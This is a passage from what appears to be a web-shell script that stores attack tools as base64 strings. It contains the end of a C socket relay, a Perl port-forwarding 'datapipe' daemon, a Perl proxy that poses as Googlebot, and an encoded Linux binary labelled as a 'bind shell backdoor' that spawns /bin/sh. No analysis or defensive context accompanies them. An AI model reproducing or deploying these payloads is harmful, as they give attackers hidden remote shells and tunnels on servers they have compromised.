+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC +ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm +lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC +iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 +xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW +QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs +ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +$prx_pl="IyF1c3IvYmluL3BlcmwKdXNlIFNvY2tldDsKbXkgJHBvcnQgPSAkQVJHVlswXXx8MzEzMzc7Cm15ICRwcm90b2NvbCA9IGdldHByb3RvYn +luYW1lKCd0Y3AnKTsKbXkgJG15X2FkZHIgID0gc29ja2FkZHJfaW4gKCRwb3J0LCBJTkFERFJfQU5ZKTsKc29ja2V0IChTT0NLLCBBRl9JTkVULCBTT +0NLX1NUUkVBTSwgJHByb3RvY29sKSBvciBkaWUgInNvY2tldCgpOiAkISI7CnNldHNvY2tvcHQgKFNPQ0ssIFNPTF9TT0NLRVQsIFNPX1JFVVNFQURE +UiwxICkgb3IgZGllICJzZXRzb2Nrb3B0KCk6ICQhIjsKYmluZCAoU09DSywgJG15X2FkZHIpIG9yIGRpZSAiYmluZCgpOiAkISI7Cmxpc3RlbiAoU09 +DSywgU09NQVhDT05OKSBvciBkaWUgImxpc3RlbigpOiAkISI7CiRTSUd7J0lOVCd9ID0gc3ViIHsKY2xvc2UgKFNPQ0spOwpleGl0Owp9Owp3aGlsZS +AoMSkgewpuZXh0IHVubGVzcyBteSAkcmVtb3RlX2FkZHIgPSBhY2NlcHQgKFNFU1NJT04sIFNPQ0spOwpteSAoJGZpc3QsICRtZXRob2QsICRyZW1vd +GVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IGFuYWx5emVfcmVxdWVzdCgpOwppZihvcGVuX2Nvbm5lY3Rpb24gKFJFTU9URSwgJHJlbW90ZV9ob3N0LCAk +cmVtb3RlX3BvcnQpID09IDApIHsKY2xvc2UgKFNFU1NJT04pOwpuZXh0Owp9CnByaW50IFJFTU9URSAkZmlyc3Q7CnByaW50IFJFTU9URSAiVXNlci1 +BZ2VudDogR29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbClcbiI7CndoaWxlICg8U0VTU0lPTj4pIHsKbmV4dCBpZi +AoL1Byb3h5LUNvbm5lY3Rpb246LyB8fCAvVXNlci1BZ2VudDovKTsKcHJpbnQgUkVNT1RFICRfOwpsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvK +TsKfQpwcmludCBSRU1PVEUgIlxuIjsKJGhlYWRlciA9IDE7CndoaWxlICg8UkVNT1RFPikgewpwcmludCBTRVNTSU9OICRfOwppZiAoJGhlYWRlcikg +eyAgICAgCmlmICgkaGVhZGVyICYmICRfID1+IC9eW1xzXHgwMF0qJC8pIHsKJGhlYWRlciA9IDA7Cn0KfQp9CmNsb3NlIChSRU1PVEUpOwpjbG9zZSA +oU0VTU0lPTik7Cn0KY2xvc2UgKFNPQ0spOwpzdWIgYW5hbHl6ZV9yZXF1ZXN0IHsKbXkgKCRmaXN0LCAkdXJsLCAkcmVtb3RlX2hvc3QsICRyZW1vdG +VfcG9ydCwgJG1ldGhvZCk7CiRmaXJzdCA9IDxTRVNTSU9OPjsKJHVybCA9ICgkZmlyc3QgPX4gbXwoaHR0cDovL1xTKyl8KVswXTsKKCRtZXRob2QsI +CRyZW1vdGVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IAooJGZpcnN0ID1+IG0hKEdFVCkgaHR0cDovLyhbXi86XSspOj8oXGQqKSEgKTsKaWYgKCEkcmVt +b3RlX2hvc3QpIHsKY2xvc2UoU0VTU0lPTik7CmV4aXQ7Cn0KJHJlbW90ZV9wb3J0ID0gImh0dHAiIHVubGVzcyAoJHJlbW90ZV9wb3J0KTsKJGZpcnN +0ID1+IHMvaHR0cDpcL1wvW15cL10rLy87CnJldHVybiAoJGZpcnN0LCAkbWV0aG9kLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7Cn0Kc3ViIG +9wZW5fY29ubmVjdGlvbiB7Cm15ICgkaG9zdCwgJHBvcnQpID0gQF9bMSwyXTsKbXkgKCRkZXN0X2FkZHIsICRjdXIpOwppZiAoJHBvcnQgIX4gL15cZ +CskLykgewokcG9ydCA9IChnZXRzZXJ2YnluYW1lKCRwb3J0LCAidGNwIikpWzJdOwokcG9ydCA9IDgwIHVubGVzcyAoJHBvcnQpOwp9CiRob3N0ID0g +aW5ldF9hdG9uICgkaG9zdCkgb3IgcmV0dXJuIDA7CiRkZXN0X2FkZHIgPSBzb2NrYWRkcl9pbiAoJHBvcnQsICRob3N0KTsKc29ja2V0ICgkX1swXSw +gQUZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90b2NvbCkgb3IgZGllICJzb2NrZXQoKSA6ICQhIjsKY29ubmVjdCAoJF9bMF0sICRkZXN0X2FkZHIpIG +9yIHJldHVybiAwOwokY3VyID0gc2VsZWN0KCRfWzBdKTsgIAokfCA9IDE7CnNlbGVjdCgkY3VyKTsKcmV0dXJuIDE7Cn0="; +$port_bind_bd_cs="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAAD4EgAAAAAAADQAIAAHACgAIgAfAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIrAkAAKwJAAAFAAAAABAAAAEAAACsCQAArJkECKyZBAg0AQAAOAEAAAYAAAAAEAAAAgAAAMAJAADAmQQIwJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAAAAAAABEAAAATAAAAAAAAAAAAAAAQAAAAEQAAAAAAAAAAAAAACQAAAAgAAAAFAAAAAwAAAA0AAAAAAAAAAAAAAA8AAAAKAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAABAAAAAAAAAAcAAAALAAAAAAAAAAQAAAAMAAAADgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4AAAAAAAAAdQEAABIAAACgAAAAAAAAAHEAAAASAAAANAAAAAAAAADMAAAAEgAAAGoAAAAAAAAAWgAAABIAAABMAAAAAAAAAHgAAAASAAAAYwAAAAAAAAA5AAAAEgAAAFgAAAAAAAAAOQAAABIAAACOAAAAAAAAAOYAAAASAAAAOwAAAAAAAAA6AAAAEgAAAFMAAAAAAAAAOQAAABIAAAB1AAAAAAAAALkAAAASAAAAegAAAAAAAAArAAAAEgAAAEcAAAAAAAAAeAAAABIAAABvAAAAAAAAAA4AAAASAAAAfwAAAEiJBAgEAAAAEQAOAEAAAAAAAAAAOQAAABIAAAABAAAAAAAAAAAAAAAgAAAAFQAAAAAAAAAAAAAAIAAAAABfSnZfUmVnaXN0ZXJDbGFzc2VzAF9fZ21vbl9zdGFydF9fAGxpYmMuc28uNgBleGVjbABwZXJyb3IAZHVwMgBzb2NrZXQAc2VuZABhY2NlcHQAYmluZABzZXRzb2Nrb3B0AGxpc3RlbgBmb3JrAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABfX2xpYmNfc3RhcnRfbWFpbgBjbG9zZQBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAQACAAAAAAAAAAEAAQAkAAAAEAAAAAAAAAAQaWkNAAACAKYAAAAAAAAAiJoECAYSAACYmgQIBwEAAJyaBAgHAgAAoJoECAcDAACkmgQIBwQAAKiaBAgHBQAArJoECAcGAACwmgQIBwcAALSaBAgHCAAAuJoECAcJAAC8mgQIBwoAAMCaBAgHCwAAxJoECAcMAADImgQIBw0AAMyaBAgHDgAA0JoECAcQAABVieWD7AjoMQEAAOiDAQAA6FsEAADJwwD/NZCaBAj/JZSaBAgAAAAA/yWYmgQIaAAAAADp4P////8lnJoECGgIAAAA6dD/////JaCaBAhoEAAAAOnA/////yWkmgQIaBgAAADpsP////8lqJoECGggAAAA6aD/////JayaBAhoKAAAAOmQ/////yWwmgQIaDAAAADpgP////8ltJoECGg4AAAA6XD/////JbiaBAhoQAAAAOlg/////yW8mgQIaEgAAADpUP////8lwJoECGhQAAAA6UD/////JcSaBAhoWAAAAOkw/////yXImgQIaGAAAADpIP////8lzJoECGhoAAAA6RD/////JdCaBAhocAAAAOkA////Me1eieGD5PBQVFJorYgECGhciAQIUVZoQIYECOhf////9JCQVYnlU+gbAAAAgcO/FAAAg+wEi4P8////hcB0Av/Qg8QEW13Dixwkw1WJ5YPsCIA94JoECAB0DOscg8AEo9yaBAj/0qHcmgQIixCF0nXrxgXgmgQIAcnDVYnlg+wIobyZBAiFwHQSuAAAAACFwHQJxwQkvJkECP/QycOQkFWJ5VeD7GSD5PC4AAAAAIPAD4PAD8HoBMHgBCnEx0XkAQAAAMdF+EyJBAjHRCQIAAAAAMdEJAQBAAAAxwQkAgAAAOgJ////iUXwg33wAHkYxwQkjIkECOg0/v//xwQkAQAAAOio/v//ZsdF1AIAx0XYAAAAAItFDIPABIsAiQQk6Jv+//8Pt8CJBCTosP7//2aJRdbHRCQQBAAAAI1F5IlEJAzHRCQIAgAAAMdEJAQBAAAAi0XwiQQk6BL+//+NRdTHRCQIEAAA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